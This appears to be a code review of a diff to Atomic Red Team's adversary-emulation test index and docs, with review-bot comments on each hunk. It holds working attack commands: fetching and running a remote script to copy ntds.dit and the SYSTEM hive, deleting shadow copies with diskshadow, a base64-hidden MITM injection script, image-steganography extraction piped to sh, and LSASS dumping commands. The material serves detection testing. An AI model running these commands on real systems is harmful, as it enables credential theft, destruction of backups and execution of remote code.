UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
- name: Copy NTDS in low level NTFS acquisition via fsutil
auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
T1558.003:
technique:
type: attack-pattern
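Review bot: two T1003.003 tests are removed after the diskshadow test in this hunk, UnderlayCopy in `MFT` mode (`f57cb283-c131-4e2f-8a6c-363d575748b2`) and in `Metadata` mode (`c7be89f7-5d06-4321-9f90-8676a77e0502`). Both fetch and `IEX` a script pinned to a commit hash at execution time and declare no `dependencies:` block; if the builder requires that key it should be made optional, since tests without prerequisites are legitimate (the `schtasks /query` test further down has none either).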
@@ -81413,7 +80529,8 @@ credential-access:
'
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1} else {exit 0}
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force
'
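Review bot: the two-line prereq on the right-hand side of this hunk is broken: `$RequiredModule.ExportedCommands['DSInternals']` looks up a cmdlet named `DSInternals`, but `ExportedCommands` is keyed by cmdlet name and `DSInternals` is the module name, so the lookup is always empty, the prereq exits 1 even with the module installed, `Install-Module` runs on every invocation and the test never becomes runnable. Either keep the single-line presence check from the left-hand side or look up a cmdlet the executor actually calls. Also guard for `Get-Module -ListAvailable` returning one object per installed version before indexing into `ExportedCommands`.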
@@ -83644,7 +82761,7 @@ discovery:
- windows
executor:
command: |
tasklist.exe /svc
tasklist.exe
sc query
sc query state= all
name: command_prompt
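Review bot: dropping `/svc` from `tasklist.exe` on the right-hand side of this hunk changes what the test demonstrates. Plain `tasklist` lists processes only, which is process discovery, whereas `/svc` prints the services hosted by each process (the `svchost.exe` to service mapping) and is the signal this T1007 service-discovery test exists to produce. Keep `tasklist.exe /svc`.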
@@ -83679,37 +82796,6 @@ discovery:
executor:
name: command_prompt
command: powershell.exe Get-Service
- name: System Service Discovery - Windows Scheduled Tasks (schtasks)
auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
description: 'Enumerates scheduled tasks on Windows using schtasks.exe.
'
supported_platforms:
- windows
executor:
name: command_prompt
command: schtasks /query /fo LIST /v
- name: System Service Discovery - Services Registry Enumeration
auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
description: |
Enumerates Windows services by reading the Services registry key
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
Manager APIs or CLI tools such as sc.exe or Get-Service.
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
ForEach-Object {
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
[PSCustomObject]@{
Name = $_.PSChildName
DisplayName = $p.DisplayName
ImagePath = $p.ImagePath
StartType = $p.Start
}
}
T1040:
technique:
type: attack-pattern
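Review bot: confirm that dropping the `System Service Discovery - Windows Scheduled Tasks (schtasks)` and `System Service Discovery - Services Registry Enumeration` tests is intentional; nothing replaces them and the commit message does not mention removals, so this could equally be the new generator skipping entries. If it is deliberate, note that the registry test was the one test here that does not go through `sc.exe`/`Get-Service` (it reads `HKLM\SYSTEM\CurrentControlSet\Services` directly), so its removal narrows what a detection engineer can exercise for this technique; the schtasks test, on the other hand, enumerates scheduled tasks rather than services and arguably did not belong under this technique in the first place.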
@@ -86308,20 +85394,20 @@ discovery:
description: |
Get a listing of network connections.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires
elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
supported_platforms:
- windows
executor:
command: |
netstat -ano
netstat
net use
net sessions 2>nul
net sessions
name: command_prompt
- name: System Network Connections Discovery with PowerShell
auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
description: |
Get a listing of network connections.
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
supported_platforms:
- windows
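Review bot: three refinements are reverted in one go: `netstat -ano` becomes `netstat` (losing owning PIDs and the numeric form that avoids name resolution), `net sessions 2>nul` loses its stderr redirect, and the description sentence saying that `net sessions` needs elevation and may return nothing for a standard user is removed. Without the redirect an unelevated run prints an access-denied error from `net sessions`, and the shortened description no longer warns about it. If this is a regeneration from an older copy of the source YAML, check the source for this test before merging rather than accepting the index as generated.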
@@ -86330,27 +85416,6 @@ discovery:
'
name: powershell
- name: System Network Connections Discovery via PowerShell (Process Mapping)
auto_generated_guid: b52c8233-8f71-4bd7-9928-49fec8215cf5
description: 'Enumerate TCP connections and map to owning process names via
PowerShell.
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
- name: System Discovery using SharpView
auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
description: "Get a listing of network connections, domains, domain users, and
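Review bot: confirm the removal of the `System Network Connections Discovery via PowerShell (Process Mapping)` test is intended. It was the only test in this group that joins `Get-NetTCPConnection` to the owning process name, which is what a detection engineer compares against EDR network telemetry; the kept `get-NetTCPConnection` test above does not do that. If the generator simply missed it, the source YAML still contains it and the index should be regenerated.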
@@ -96486,29 +95551,7 @@ impact:
x_mitre_impact_type:
- Availability
identifier: T1496
atomic_tests:
- name: Windows - Simulate CPU Load with PowerShell
auto_generated_guid: 44315fb0-f78d-4cef-b10f-cf21c1fe2c75
description: |
This test simulates high CPU load using PowerShell, commonly seen in resource hijacking.
Spawns background jobs to stress CPU cores for a specified duration.
supported_platforms:
- windows
input_arguments:
duration_seconds:
description: Duration in seconds to run the CPU stress test
type: integer
default: 30
cpu_threads:
description: Number of threads to stress (default 4)
type: integer
default: 4
executor:
command: |
$end = (Get-Date).AddSeconds(#{duration_seconds})
1..#{cpu_threads} | ForEach-Object { Start-Job { param($t) while((Get-Date) -lt $t) { $i=0; while($i -lt 200000){$i++} } } -ArgumentList $end }
Get-Job | Wait-Job | Remove-Job
name: powershell
atomic_tests: []
T1565.002:
technique:
type: attack-pattern
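Review bot: T1496 goes from one test (`Windows - Simulate CPU Load with PowerShell`) to `atomic_tests: []`, and the commit message gives no reason. Since the index is generated, check that the technique's YAML and its generated markdown changed consistently in the same commit, otherwise the index and the per-technique docs will disagree about whether T1496 has tests. The same pattern appears for T1659 further down.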
@@ -97163,35 +96206,6 @@ impact:
cleanup_command: 'sc sdset VSS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;LC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
'
- name: Windows - Delete Volume Shadow Copies via Diskshadow
auto_generated_guid: 42111a6f-7e7f-482c-9b1b-3cfd090b999c
description: 'Deletes Windows Volume Shadow Copies via Diskshadow binary. This
technique is used by numerous ransomware families such as Crytox. The binary
is present by default in Windows Server operating systems (since Windows Server
2008). Upon execution, it will delete all shadow copies of the server.
'
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Create volume shadow copy of C:\ . This prereq command only
works on Windows Server or Windows 8.
'
prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
that satisfy the query.")) { exit 0 } else { exit 1 }
'
get_prereq_command: 'vssadmin.exe create shadow /for=c:
'
executor:
command: '"delete shadows all" | diskshadow.exe
'
name: powershell
elevation_required: true
T1561.001:
technique:
type: attack-pattern
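Review bot: the `Windows - Delete Volume Shadow Copies via Diskshadow` test is dropped while the preceding test's `sc sdset VSS …` cleanup is kept as context, so this is not a removal of the whole technique group; please confirm it is deliberate rather than a generator omission. The removed test was the one whose prerequisite first created a shadow copy (`vssadmin.exe create shadow /for=c:`) so that the deletion step actually had something to delete, which makes it the most useful of the group for validating detections on Windows Server.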
@@ -98439,66 +97453,7 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection (Windows)
auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'winget install --id Python.Python.3 -e
'
- description: curl must be installed
prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'winget install --id cURL.cURL -e
'
- description: mitmproxy must be installed and in PATH
prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'python -m pip install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
| Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
-like "*mitmdump*" }) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
atomic_tests: []
T1078.001:
technique:
type: attack-pattern
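Review bot: T1659 `MITM Proxy Injection (Windows)` is removed and the technique left with `atomic_tests: []`; confirm that is intended. For whoever decides whether to restore it: the fourth dependency's `get_prereq_command` starts `mitmdump` in the background with an injection script decoded from an inline base64 literal (`$code = '…'`), and the cleanup runs `Stop-Process -Name "mitmdump"`, which kills any mitmdump instance on the host, not just the one the test started. If it comes back, store the script as a readable file under the atomics folder and have the cleanup target the PID that `Start-Process` returned.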
+74 -60
View File
@@ -1,19 +1,23 @@
# T1001.002 - Data Obfuscation via Steganography
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1001/002)
<blockquote>
## Description from ATT&CK
Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.
> Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.
[Source](https://attack.mitre.org/techniques/T1001/002)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Steganographic Tarball Embedding](#atomic-test-1-steganographic-tarball-embedding)
- [Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage](#atomic-test-2-embedded-script-in-image-execution-via-extract-invoke-psimage)
- [Atomic Test #3: Execute Embedded Script in Image via Steganography](#atomic-test-3-execute-embedded-script-in-image-via-steganography)
- [Atomic Test #1 - Steganographic Tarball Embedding](#atomic-test-1---steganographic-tarball-embedding)
### Atomic Test #1: Steganographic Tarball Embedding
- [Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage](#atomic-test-2---embedded-script-in-image-execution-via-extract-invoke-psimage)
- [Atomic Test #3 - Execute Embedded Script in Image via Steganography](#atomic-test-3---execute-embedded-script-in-image-via-steganography)
<br/>
## Atomic Test #1 - Steganographic Tarball Embedding
This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball)
within an image.
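Review bot: the table-of-contents anchors change from `#atomic-test-1-steganographic-tarball-embedding` to `#atomic-test-1---steganographic-tarball-embedding` and the test headings from `###` to `##`. The triple hyphen is what GitHub's slug rule produces for `Atomic Test #1 - …` (the `#` is dropped and ` - ` becomes `---`), so the links resolve on GitHub; spot-check them in the renderer this site uses, since a renderer that collapses repeated hyphens would break every TOC entry. The `<blockquote>` to `>` conversion keeps the ATT&CK link via the added `[Source]` line, so nothing is lost there.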
@@ -27,10 +31,14 @@ By embedding the tarball file within the image, adversaries can obscure their ac
**Supported Platforms:** Windows
**auto_generated_guid:** `c7921449-8b62-4c4d-8a83-d9281ac0190b`
#### Inputs
**auto_generated_guid:** c7921449-8b62-4c4d-8a83-d9281ac0190b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| image_file | Image file which will be downloaded to be used to hide data | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;T1001.002.jpg|
@@ -38,77 +46,70 @@ By embedding the tarball file within the image, adversaries can obscure their ac
| new_image_file | new image file ready for extraction | path | $env:PUBLIC&#92;Downloads&#92;T1001.002New.jpg|
| passwords_file | Text file containing random passwords | path | $env:TEMP&#92;random_passwords.txt|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Image file must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
```
##### Description: File to hide within tarz file must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{passwords_file}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Output "Generating random passwords and saving to file..."
$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?') | Get-Random }) }
$passwords | Out-File -FilePath "#{passwords_file}"
```
##### Description: Tarz file to embed in image must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{tar_file}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Output "Generating tarz file..."
tar -cvf "#{tar_file}" "#{passwords_file}"
```
### Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage
<br/>
<br/>
## Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage
This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file.
The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden
within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
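Review bot: the prereq checks carried through as context have a latent bug: `if (!(Test-Path "#{image_file}")) {exit 1} else {` / `{exit 0}` / `}` wraps `exit 0` in a nested scriptblock literal that is never invoked, so the else branch only "passes" because the script falls off the end with exit code 0; `else {exit 0}` is what is meant, and the T1003.001 checks in this same commit use that form. Separately, `Get-Content … -Encoding byte` / `Set-Content … -Encoding byte` in the attack command is Windows PowerShell 5.1 syntax; PowerShell 7 removed `-Encoding byte` in favour of `-AsByteStream`, so the test fails under `pwsh`.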
@@ -122,16 +123,22 @@ is done to emulate an attackers behaviour in the case they were to execute malwa
**Supported Platforms:** Windows
**auto_generated_guid:** `04bb8e3d-1670-46ab-a3f1-5cee64da29b6`
#### Inputs
**auto_generated_guid:** 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| image_file | Malicious Image file which will be downloaded | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;evil_kitten.jpg|
| psimage_script | Extract-Invoke-PSImage Script downloaded | path | PathToAtomicsFolder&#92;ExternalPayloads&#92;Extract-Invoke-PSImage.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
cd "PathToAtomicsFolder\ExternalPayloads\"
@@ -150,8 +157,7 @@ $textMatches -join '' | Set-Content -Path $scriptPath
. "$HOME\textExtraction.ps1"
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore
@@ -159,39 +165,31 @@ Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Image file must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
```
##### Description: Extract-Invoke-PSImage must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (!(Test-Path "#{psimage_script}")) {exit 1} else {
{exit 0}
}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
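Review bot: `Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}` leaves the substituted path unquoted, unlike the Test #1 prerequisite (`-OutFile "#{image_file}"`). If `PathToAtomicsFolder` resolves to a directory with a space in it, the argument is split, the download lands somewhere else, and the `Test-Path` check above keeps failing. Quote it.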
@@ -199,30 +197,46 @@ $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165
Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
```
### Atomic Test #3: Execute Embedded Script in Image via Steganography
<br/>
<br/>
## Atomic Test #3 - Execute Embedded Script in Image via Steganography
This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.
**Supported Platforms:** Linux
**auto_generated_guid:** `4ff61684-ad91-405c-9fbc-048354ff1d07`
#### Inputs
**auto_generated_guid:** 4ff61684-ad91-405c-9fbc-048354ff1d07
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script | Shell Script file to be embedded and executed | String | PathToAtomicsFolder/script.sh|
| evil_image | The modified image with embedded script | String | PathToAtomicsFolder/evil_image.jpg|
| image | Image file to be embedded | String | PathToAtomicsFolder/image.jpg|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"; strings "#{evil_image}" | tail -n 1 | base64 -d | sh
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm "#{evil_image}"
```
<br/>
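Review bot: the `sh` attack command has a length-dependent failure that should be fixed in the source YAML. GNU `base64` wraps at 76 columns, and the `xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p` stage reproduces its output byte for byte (it hex-encodes and then decodes the same text, so it is a no-op), so any script longer than 57 bytes is appended as several lines; `strings "#{evil_image}" | tail -n 1` then returns only the last line and `base64 -d | sh` either errors or runs a truncated script. `base64 -w0` fixes it, and the dead `xxd` round trip can go. Two smaller points: the `image` input is described as "Image file to be embedded" but it is the carrier image the script is embedded into, and the `-OutFile #{psimage_script}` at the top of this hunk has the same unquoted-path problem as the previous hunk.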
+329 -199
View File
@@ -1,56 +1,72 @@
# T1003.001 - OS Credential Dumping: LSASS Memory
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
> Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
>
> As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
>
> For example, on the target host use procdump:
>
> * <code>procdump -ma lsass.exe lsass_dump</code>
>
> Locally, mimikatz can be run using:
>
> * <code>sekurlsa::Minidump lsassdump.dmp</code>
> * <code>sekurlsa::logonPasswords</code>
>
> Built-in Windows tools such as `comsvcs.dll` can also be used:
>
> * <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
>
> Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)
>
> Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
>
> The following SSPs can be used to access credentials:
>
> * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
> * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
> * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
> * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
[Source](https://attack.mitre.org/techniques/T1003/001)
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
Locally, mimikatz can be run using:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
Built-in Windows tools such as `comsvcs.dll` can also be used:
* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Dump LSASS.exe Memory using ProcDump](#atomic-test-1-dump-lsassexe-memory-using-procdump)
